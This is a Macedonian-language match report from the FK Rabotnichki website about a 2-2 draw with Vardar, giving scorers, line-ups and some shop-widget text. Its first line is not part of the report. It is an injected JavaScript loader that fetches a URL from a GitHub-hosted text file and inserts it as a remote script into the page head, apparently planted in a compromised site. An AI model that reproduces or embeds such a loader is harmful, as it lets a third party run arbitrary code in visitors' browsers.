;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Силјановски донесе реми (2-2) против Вардар
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Силјановски донесе реми (2-2) против Вардар

Работнички ремизираше (2-2) против Вардар во рамките на 33.коло од Првата фудбалска лига. По овој нерешен резултат, нашиот тим се наоѓа на третата позиција на табелата со 53 освоени бода, два повеќе од Пелистер.

Дербито со Вардар донесе допадлив фудбал, многу шанси на двете страни и четири гола, по два во обете мрежи.
Уште во втората минута, се закани Бобан Николов, но шутираше над голот на Шишковски. Во 13.минута, Боарето шутираше, но Шишковски беше на вистинското место, а потоа возврати Дурански со одличен удар, а се искажа Алексовски.

img_9051

Во 36.минута, Вардар дојде во водство со голот на Џигаури. Тој упати удар со левата нога од десетина метри и ја затресе мрежата на Работнички. На самјиот истек од првиот дел, Иван Вуковиќ со силен удар ја погоди гредата од голот на Вардар.

Работнички израмни во 54.минута, со голот на Нехар Садики. Но, само шест минути подоцна, Барсегјан по вторпат погоди за „црвено-црните“ по додавањето од Велковски.

img_8854

Елмас се закани во 86.минута со волеј удар, но беше за малку непрецизен, а тоа беше најава за израмнувањето. Херера одлично продре по левата страна, нафрли за Силјановски, а тој со прецизен удар од десетина метри го израмни резултатот.

РАБОТНИЧКИ – ВАРДАР 2-2 (0-1)

„Телеком Арена“ во Скопје. Гледачи: 500. Судија: Марјан Ецкоски (Охрид). Стрелци: Садики 54’, Силјановски 88’ (Работнички), Џигаури 36’, Барсегјан 60’ (Вардар). Ж. картони: Силјановски (Работнички).

РАБОТНИЧКИ: Шишковски, Силјановски, Митрев, Садики, Херера, Најденов, Дурански, Демир (58’ Елмас), К. Маркоски, Ивановски (84’ Наумчевски), Вуковиќ.

ВАРДАР: Алексовски, Брдаровски, Новак, Попов, Глишиќ, Велковски (74’ Блажевски), Николов, Спировски, Барсегјан, Боарето (61’ Глигоров), Џигаури (82’ Којашевиќ).